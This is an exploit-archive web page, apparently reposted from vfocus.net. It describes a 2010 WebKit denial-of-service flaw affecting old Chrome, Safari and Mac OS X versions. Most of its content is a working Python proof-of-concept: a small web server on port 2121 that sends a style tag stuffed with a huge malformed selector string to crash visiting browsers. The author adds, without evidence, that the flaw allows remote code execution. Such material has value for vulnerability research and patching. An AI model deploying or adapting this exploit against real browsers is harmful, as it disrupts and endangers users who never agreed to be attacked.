首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 WebKit Style Tag Remote Denial of Service Vulnerability 来源：vfocus.net 作者：vfocus 发布时间：2010-03-08   ======================================================= WebKit Style Tag Remote Denial of Service Vulnerability ======================================================= Vulnerable:  WebKit Open Source Project WebKit 0 Google Chrome 4.0.249 .89 Google Chrome 4.0.249 .78 Apple Safari 4.0.4 for Windows Apple Safari 4.0.4 Apple Mobile Safari 0 + Apple Mac OS X 10.4.2 + Apple Mac OS X 10.4.2 + Apple Mac OS X 10.4.1 + Apple Mac OS X 10.4.1 + Apple Mac OS X 10.4 + Apple Mac OS X 10.4 + Apple Mac OS X Server 10.4.2 + Apple Mac OS X Server 10.4.1 + Apple Mac OS X Server 10.4.1 + Apple Mac OS X Server 10.4 + Apple Mac OS X Server 10.4 Exploit code: #!/usr/bin/python #                       , #                      dM #                      MMr #                     4MMML                  . #                     MMMMM.                xf #     .              "M6MMM               .MM- #      Mh..          +MM5MMM            .MMMM #      .MMM.         .MMMMML.          MMMMMh #       )MMMh.        MM5MMM         MMMMMMM #        3MMMMx.     'MMM3MMf      xnMMMMMM" #        '*MMMMM      MMMMMM.     nMMMMMMP" #          *MMMMMx    "MMM5M\    .MMMMMMM= #           *MMMMMh   "MMMMM"   JMMMMMMP #             MMMMMM   GMMMM.  dMMMMMM            . #              MMMMMM  "MMMM  .MMMMM(        .nnMP" #   ..          *MMMMx  MMM"  dMMMM"    .nnMMMMM* #    "MMn...     'MMMMr 'MM   MMM"   .nMMMMMMM*" #     "4MMMMnn..   *MMM  MM  MMP"  .dMMMMMMM"" #       ^MMMMMMMMx.  *ML "M .M*  .MMMMMM**" #          *PMMMMMMhn. *x > M  .MMMM**"" #             ""**MMMMhx/.h/ .=*" #                      .3P"%.... #             [t12]  nP"     "*MMnx #           SMOKE WEED #greetz to my blackhatz and baycatz #iPhone CSS::Selector crash #this Python script acts as a web server and sends a malformed long string to the CSS <style> tag #this is a remote crash bug, hoever an analysis of the debug dump shows remote code execution capability, I am just lazy import sys, socket; def main():     junk = "*>" * 120000;          html = """         <html>         <head>         <style type="text/css">         """;     html += junk;     html += """         body {background: blue;}         </style>         </head>         </html>         """;     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);     s.bind(('',2121));     s.listen(1);          while True:         channel, details = s.accept();         print channel.recv(1024);         channel.send(html);         channel.close(); main();   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·BigForum Version 4.5 SQL Injec ·Namoroka 3.6 Alpha 1 Remote Me ·Yahoo Player 1.0 (.m3u) Local ·Kolang (proc_open PHP safe mod ·Authentium Command Free Scan A ·ONECMS v2.5 SQL Injection Vuln ·Sagem Routers remote authentic ·Flare <= 0.6 Local Heap Overfl ·Yahoo Player v1.0 (.m3u/.pls/. ·JITed stage-0 shellcode ·Sagem Routers Remote Auth bypa ·Apache 2.2.14 mod_isapi Dangli   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved